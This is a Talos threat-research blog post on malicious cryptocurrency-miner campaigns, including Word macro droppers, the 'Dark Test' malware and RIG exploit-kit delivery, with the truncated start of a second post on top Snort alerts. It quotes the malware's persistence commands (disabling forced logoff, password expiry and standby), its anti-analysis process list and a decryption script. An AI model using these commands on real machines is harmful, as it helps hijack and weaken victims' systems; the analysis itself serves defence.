\n\n\n[](<https://2.bp.blogspot.com/-YCNN3stnTLI/WnG3utpzHHI/AAAAAAAAAk4/cCbjw9yYuCgHf0Q5TZgqKlXA6OBCPxb_ACLcBGAs/s1600/image4.png>)\n\n**Example Word Document**\n\n \nAs is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used. \n \nThis image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function: \n\n\n[](<https://4.bp.blogspot.com/-dyl8BOtHiUE/WnG303uF5iI/AAAAAAAAAk8/B-VcgP43bnU3nMYcTAfcxrp_IwAxif2ewCLcBGAs/s1600/image22.png>)\n\n**Highly Obfuscated VBA Macros Using Document_Open()**\n\n \n\n\nThe macro leads to a call to a Shell command: \n\n\n[](<https://1.bp.blogspot.com/-XOkkw3a6yUE/WnG4AVkCURI/AAAAAAAAAlA/VrDifm1A5oovDdn32WTa6HO76vUcmQJtQCLcBGAs/s1600/image32.png>)\n\n**Highly Obfuscated VBA Macro VBA.Shell Call**\n\n \nWe can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call: \n\n\n[](<https://2.bp.blogspot.com/--COaPZAv6Ew/WnG4LxL9dfI/AAAAAAAAAlE/GYytdgVpwOsm3yOL6Zh-z_UQAvlPFI6AQCLcBGAs/s1600/image30.png>)\n\n**MsgBox for Shell Replacement**\n\n \nThis will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid: \n\n\n[](<https://2.bp.blogspot.com/-mmTPAo0x4MQ/WnG4WK_-dTI/AAAAAAAAAlQ/J_DdWb9W-BsYAda0piFe3P56gM_gGVrTQCLcBGAs/s1600/image10.png>)\n\n**Office Document Launches a Powershell Indicator in Threat Grid**\n\n \nWe also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension: \n\n\n[](<https://2.bp.blogspot.com/-YzD2ro54GK0/WnG5aJkJG5I/AAAAAAAAAlg/0ehj3iBDLigETrSyPdQvkcM7NJB5qr7OwCLcBGAs/s1600/image19.png>)\n\n**Portable Executable Image Extension Identification Threat Grid**\n\n \nIn this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid: \n\n\n[](<https://3.bp.blogspot.com/-oAAn84JRp6M/WnG5k-T3a2I/AAAAAAAAAlk/RrVDgGKgj90yTIzm_Bap_fG6o9T89qdgwCLcBGAs/s1600/image20.png>)\n\n**xmrig Execution in Threat Grid**\n\n \nDynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory: \n\n\n[](<https://1.bp.blogspot.com/-AniIUgZrSrA/WnG5ui4mMwI/AAAAAAAAAlo/SgG7inliyH8OQPc9WLo_oug-1ct2g04dwCLcBGAs/s1600/image13.png>)\n\n**Dynamic Miner Execution in AMP for Endpoint's Device Trajectory**\n\n \nMining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments: \n\n\n[](<https://4.bp.blogspot.com/-TJimRD6275k/WnG53Hz4rCI/AAAAAAAAAls/8Ahjkqr-spA-ffuY1RQ0SWRpZ2dkQnDegCLcBGAs/s1600/image12.png>)\n\n**Mining Traffic Classification using Cognitive Threat Analytics**\n\n \n\n\n### Dark Test Cryptomining Malware\n\n \nDark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail. \n \n\n\n### Dark Test Obfuscation\n\n \nDark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize. \n \nDark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer: \n\n\n[](<https://2.bp.blogspot.com/-FW3xpQMFWTQ/WnG5_oHjZ7I/AAAAAAAAAlw/BiZn3XD0hlwNOu4QsRcNJPWt6FsOLshjwCLcBGAs/s1600/image29.png>)\n\n**Dynamic Method Resolution Using metadataToken Integer**\n\n \nFunctions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters: \n\n\n[](<https://4.bp.blogspot.com/-BxKE4FUS_xo/WnG6HeOmbpI/AAAAAAAAAl0/iH44lM8q1Wo8CMZE61rxRgNrfLeUs_IeQCLcBGAs/s1600/image6.png>)\n\n**Runtime Resolved Function Calls using calli**\n\n \nThe decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset: \n\n\n[](<https://2.bp.blogspot.com/-5fAlSxHtsCs/WnG6PTD63ZI/AAAAAAAAAl8/WSBazviqxpMRnVke6nqudB0XZFWbrfDGgCLcBGAs/s1600/image27.png>)\n\n**Dark Test String Decryption Function**\n\n \nAt the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects: \n\n\n[](<https://3.bp.blogspot.com/-QHHC8NNpqhs/WnG6WuFY_3I/AAAAAAAAAmE/vyUgwV2z5egBm1veQbHpnJzX2_YsHa4agCLcBGAs/s1600/image17.png>)\n\n**Dark Test String Decryption Function Call**\n\n \nThe result, in this case, being the string \"-o pool.minexmr.com:4444 -u\" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use): \n\n\n[](<https://3.bp.blogspot.com/-Bnn3A7ixXqo/WnG6dckoDWI/AAAAAAAAAmI/TmyF9F_Qr5Ms7ycfr9SXEoE4p9N68VaCgCLcBGAs/s1600/image2.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \n\n\nRuntime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges: \n\n \n \n #!/usr/bin/ruby \n \n fr = File.read(ARGV[0]) \n fb = fr.bytes \n \n for i in 0..fb.length-4 \n #Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource \n if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28 \n #Perform their arithmetic with provided bytes into an 32-bit int \n length = [fb[i-1], 106, 242, 28].pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] - 5 ^ 485648943 \n seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]] \n seek_offset = (seek_offset_bytes.pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] ^ 2100157544) - 100 \n puts \"Found length of: #{length}\" \n puts \"Seek offset bytes: #{seek_offset_bytes.inspect}\" \n ciphertext = [] \n for j in 0..length-1 \n ciphertext << fb[seek_offset+j] \n end \n if length > 2 \n for x in 0x00..0xFF \n finished = true \n result = [] \n for c in ciphertext \n unless((x ^ c).between?(0x20,0x7E)) \n finished = false \n break \n end \n result << (x ^ c) \n end \n if finished \n puts \"Found possible XOR key for string: #{result.pack(\"I*\").split(\"\\x00\").join} of length: #{length}\" \n end \n end \n end \n end \n end \n \n \n\nThis brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining: \n\n \n \n /C net accounts /forcelogoff:no\n\nThis prevents forced logoffs from remote administrators. \n\n \n \n /C net accounts /maxpwage:unlimited\n\nThis sets the maximum password age to unlimited, which in turn prevents password expiry. \n\n \n \n /C powercfg /x /standby-timeout-ac 0\n\nThis will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle. \n\n \n \n /C reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99\n\nThis will prevent the screensaver from starting. \n \nFurther, observed strings are those for anti-analysis: \n\n \n \n procexp \n PROCEXP \n pROCESShACKER \n ProcessHacker \n procexp64 \n Detect detector! \n Clear! \n taskmgr\n\n### Dark Test Network traffic\n\n \nTwo GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip \n\n\n[](<https://3.bp.blogspot.com/-Qc4_UEtvGbQ/WnG6t_zCEDI/AAAAAAAAAmU/Tbbi2yeKVKkhvIOmytvbMe3huDcz2cZJwCLcBGAs/s1600/image18.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \nOddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments: \n\n\n[](<https://1.bp.blogspot.com/-8Tjmvd6M01E/WnG61VY3rZI/AAAAAAAAAmc/jUfzdPmMu38oApQ9rKvbqIutNJdpdgttQCLcBGAs/s1600/image33.png>)\n\n**Pastebin SQL Commands**\n\n \nThis further implies the possibility of a builder or distributed gateway being used. Further searches turned up a number of in-the-wild filenames which correspond to wares: \n\n\n[](<https://3.bp.blogspot.com/-lPM4zO7Yy-I/WnG6-j_QqsI/AAAAAAAAAmg/eb6YMKLP9m02kqcHC39H5BowbycRyZLmgCLcBGAs/s1600/image15.png>)\n\n**Dark Test VirusTotal Observed in-the-wild Filenames**\n\n \nThis could indicate warez as being a possible distribution vector for this malware. \n \n\n\n### Dark Test Version 2\n\n \nThroughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW: \n\n\n[](<https://3.bp.blogspot.com/-yMVA8UyzTPM/WnG7LBRPlAI/AAAAAAAAAmk/F1xZeoz6HuQ9IfwbpwapLaZ_XfFKSbucgCLcBGAs/s1600/image14.png>)\n\n**Anti-Analysis Strings**\n\n \nAn interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC. \n \n\n\n### Exploit Kit Based\n\n \nIn addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below: \n\n\n[](<https://4.bp.blogspot.com/-cRla5BFyQAo/WnG81bNNsbI/AAAAAAAAAm4/76tiUp0EMDIoF_TkhbSJyUWBXH02-upbACLcBGAs/s1600/image23.png>)\n\n**Command Line Syntax**\n\n \nUsing the Worker ID of: \n\n \n \n 43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD\n\nwe began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day. \n \nThat may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually. \n \nHowever, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec. \n\n\n[](<https://4.bp.blogspot.com/-S2jqc1PAgvQ/WnG9HDPM8zI/AAAAAAAAAm8/9BTHhW1hh2wYgMTCDMX4KXsFvaWSuElKQCLcBGAs/s1600/image16.png>)\n\n**Historical Hash Rate**\n\n \nThe campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader. \n \n\n\n### Active Exploitation\n\n \nIn addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently a Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain. \n \nWhen you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining. \n \n\n\n## Deeper Dive on Mining and Workers\n\n \nOver the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain. \n \nOne thing that has been common with most of the malicious miners we found were the filename choices. Threat actors have chosen filenames that look harmless, such as \"Windows 7.exe\" and \"Windows 10.exe\". Additionally, Talos commonly saw \"taskmgrss.exe\", \"AdobeUpdater64.exe\", and \"svchost.exe\". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below. \n\n\n[](<https://3.bp.blogspot.com/-4AgsOM4lq_Y/WnG9YRuQ6vI/AAAAAAAAAnA/0uu00Q-7QMQueR7KPdE5qKzbn_p0K3p9gCLcBGAs/s1600/image28.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product [Immunet](<http://www.immunet.com/index>). \n \n\n\n## Mining as a Payload for the Future\n\n \nCryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will be likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal. \n \nThe sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the later case ransomware can be used a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more. \n \nSimply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it. \n \nRecurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue. \n \nContinuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive. \n \n\n\n## Are Miners Malware?\n\n \nMining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem &amp; network. \n \nIf a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors. \n \n\n\n## Enterprise Impacts\n\n \nRegardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments. \n \nThis is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin. \n \nDue to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such. \n \n\n\n## Fails we Found\n\n \nWhile investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below: \n\n\n[](<https://4.bp.blogspot.com/-gYfSx4Z3fR4/WnG9hB4ZaOI/AAAAAAAAAnE/EK10eb8tztI0t8vU5UKISuX3zSzLIVjPgCLcBGAs/s1600/image9.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves. \n\n\n[](<https://4.bp.blogspot.com/-Serv6ugXd5s/WnG9qlxt1GI/AAAAAAAAAnI/BQeRNxdbKKkQ3aOYZ2aZrGQFwAa74aOOgCLcBGAs/s1600/image34.png>)\n\n**Source Code Default Values**\n\n \nIn several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below: \n\n\n[](<https://2.bp.blogspot.com/--VxrS9BeGXA/WnG9ydG0RlI/AAAAAAAAAnM/j_rDz4bvK384-fHed56GXcDehQ9P-Dt_QCLcBGAs/s1600/image25.png>)\n\n**Mining Fail Example #1**\n\n[](<https://3.bp.blogspot.com/-w3Y6QyEIEP8/WnG96btX1wI/AAAAAAAAAnU/5jijQ_mBw6Q89KlaCgw506k5Ef2rNwBgwCLcBGAs/s1600/image8.png>)\n\n**Mining Fail Example #2**\n\n[](<https://1.bp.blogspot.com/-lzwj4E9U-0o/WnG-Cc7XTYI/AAAAAAAAAnY/MSP3Pngrk0AtEgq5ceto9lyo6cdNFF9lQCLcBGAs/s1600/image3.png>)\n\n**Mining Fail Example #3**\n\n[](<https://2.bp.blogspot.com/-boqhpLlFsxw/WnG-JhPkK6I/AAAAAAAAAnc/pZdDYcGpxw4B6pFIf6tV65MtkC9f9-7zACLcBGAs/s1600/image1.png>)\n\n**Mining Fail Example #4**\n\n \nThis clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks. \n \nAdditionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a \"Personal Threshold\" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure: \n \n\n \n \n \"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000\"\n\n \nWhere $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary. \n \n\n\n## Conclusion\n\n \nThe number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected. \n \nCrypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years. \n \nIt also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward. \n \n\n\n## Coverage\n\n \nThere are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550. \n \nAlso, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted. \n \n\n\n## IOC Section\n\n \n\n\n### IP Addresses:\n\n \n89.248.169[.]136 \n128.199.86[.]57 \n\n\n### \n\n### Domains:\n\n \nqyvtls749tio[.]com \nyouronionlink[.]onion \n \n\n\n### [File Hashes](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5a71e1c64654d.txt>)\n\n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=nyH5a-BdwkQ:qkNEPRJJDb0:yIl2AUoC8zA>)\n\n", "cvss3": {}, "published": "2018-01-31T07:58:00", "type": "talosblog", "title": "Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3506"], "modified": "2018-01-31T16:34:16", "id": "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nyH5a-BdwkQ/malicious-xmr-mining.html", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-29T19:59:49", "description": "_This post was written by [Martin Lee](<https://www.blogger.com/profile/17941683095374027310>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._\n\n \n\n\n2017 was an eventful year for cyber security with high profile vulnerabilities that allowed self-replicating worm attacks such as [WannaCry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [BadRabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) to impact organizations throughout the world. In 2017, Talos researchers discovered many new attacks including backdoors in legitimate software such as [CCleaner](<https://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html>), designed to target high tech companies as well as [M.E.Doc](<http://blog.talosintelligence.com/2017/07/the-medoc-connection.html>), responsible for initial spread of [Nyetya](<http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>). Despite all those, headline making attacks are only a small part of the day to day protection provided by security systems.\n\n \n\n\nIn this post we review some of the findings created by investigating the most frequently triggered Snort signatures as reported by [Cisco Meraki](<https://meraki.cisco.com>) systems and included in the Snort default policy set.\n\n \n\n\n## Top 5 Signatures\n\n \n\n\nSnort signatures are classified into different classes based on the type of activity detected with the most commonly reported class type being \u201cTrojan-activity\u201d followed by \u201cPolicy-violation\u201d and \u201cMisc-activity\u201d. Some less frequently reported class types such as \u201cAttempted-admin\u201d and \u201cWeb-application-attack\u201d are particularly interesting in the context of detecting malicious inbound and outbound network traffic.\n\n \n\n\nSnort signatures are identified from three parts. The Generator ID (GID), the Signature ID (SID) and revision number. The GID identifies what part of Snort generates the event; \u20181\u2019 indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search box on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule; be sure to use the latest revision of any rule.\n\n \n\n\nWithout a further ado, here are the top 5 triggered signatures within policy in reverse order, just as you would expect from a yearly Top of the Snort alerts chart. \n\n### #5 - 1:39867:3 \u201cSuspicious .tk dns query\u201d\n\n \n\n\nThe .tk top level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the prolific in terms of number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers.\n\n \n\n\nThis signature triggers on DNS lookups for .tk domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.\n\n \n\n\nOther, similar signatures detecting DNS lookups to other rarely used top level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules.\n\n### #4 - 1:23493:6 \u201cWin.Trojan.ZeroAccess outbound connection\u201d\n\n \n\n\nZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns. This rule detects UDP packets sent by an infected system to so called super nodes, which participate in the network of command and control servers. The rule can be used to block outbound communication from the malware.\n\n \n\n\nZeroAccess is a state of the art rootkit and is able to hide from the basic detection techniques on the infected machine. However, network detection using IPS such as Snort can quickly pinpoint a source of the malicious ZeroAccess traffic as it generates a fairly noisy and regular communication pattern.\n\n \n\n\nThe malware sends a UDP packet to check with a super node once every second, so a single affected organization is expected to have many alerts. This may be one of the reasons why the ZeroAccess detection signature is placed high on our list.\n\n### #3 - 1:41083:1 \u201csuspicious .bit dns query\u201d\n\n \n\n\nThe .bit top level domain extension is relatively obscure, but is occasionally used for hosting malware C2 systems with Necurs being one of the families using it as a part of the botnet communication. The .bit TLD is managed using Namecoin, a distributed ledger with no central authority that is one of the first forks of the Bitcoin cryptocurrency. The decentralised nature of .bit domains means that few DNS servers resolve the domains, but equally the domains are resistant to take down.\n\n \n\n\nThe signature triggers on DNS lookups for .bit domains. As with .tk lookups, if the signature triggers, this doesn\u2019t necessarily mean that such a lookup is malicious in nature. However, a sharp increase in the rule triggering may warrant investigation.\n\n### #2 - 1:42079:1 \u201cWin.Trojan.Jenxcus outbound connection attempt with unique User-Agent\u201d\n\n \n\n\nJenxcus is more of a worm than a trojan, despite the naming used in the human readable description of the signature. It spreads by copying itself to removable and shared drives and allows the attacker to remotely access and control the infected system. Like many trojans, once a system is infected, Jenxcus seeks to establish contact with its\u2019 C2 infrastructure. This contact is made with a HTTP POST request using a specific user-agent string. The user-agent string itself is specific to this trojan and its many variants, and can be detected and blocked using this signature.\n\n### #1 - 1:40522:3 \u201cUnix.Trojan.Mirai variant post compromise fingerprinting\u201d\n\n \n\n\nInternet of Things (IoT) security is something which we have written about [extensively](<http://blog.talosintelligence.com/2017/06/the-internet-of-vulnerable-things.html>). The Mirai botnet, and variants, continue to try and infect IoT devices through attempting to login with default usernames and passwords. Once the malware successfully accesses a device, it will check that the device behaves as expected and not like a honeypot. It is this check which is detected by this rule. This post compromise activity has been constantly present throughout the year and at the peak of its activity in February accounted for over 20% of all alerts reported daily.\n\n[](<https://4.bp.blogspot.com/-If7RuT_F_2M/Wm9fBRZAa8I/AAAAAAAAADo/C_BUhkG31aovUEOcnZ-c7-z520ZS9dVgQCLcBGAs/s1600/mirai.jpg>)\n\n \n\n\n## Inbound, Outbound or Internal\n\n \n\n\nNetwork traffic can cross an IDS from external to internal (inbound) from the internal to external (outbound) or pass the sensor without traversing it, as internal traffic. An alert may be triggered and logged for any of these scenarios.\n\n \n\n\nOutbound signatures were triggered during 2017 much more frequently than internal, which in turn were more frequent than inbound with ratios of approximately 9:6:5. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. Internal alerts are most likely to be due to trojan or miscellaneous activity.\n\n \n\n\nLooking at these data sets in more detail gives us the following:\n\n[](<https://4.bp.blogspot.com/-Vx8dv-DQBMw/Wm9hby18fUI/AAAAAAAAAD0/1S9x5QFNs-cNMqigLaj8NgQddaLl-vm8gCLcBGAs/s1600/inbound.jpg>)\n\n \n\n\n\u201cTrojan-activity\u201d class type alerts were dominated by the Mirai post compromise fingerprinting attempts, but this category also contains blocked attempts to download executable files 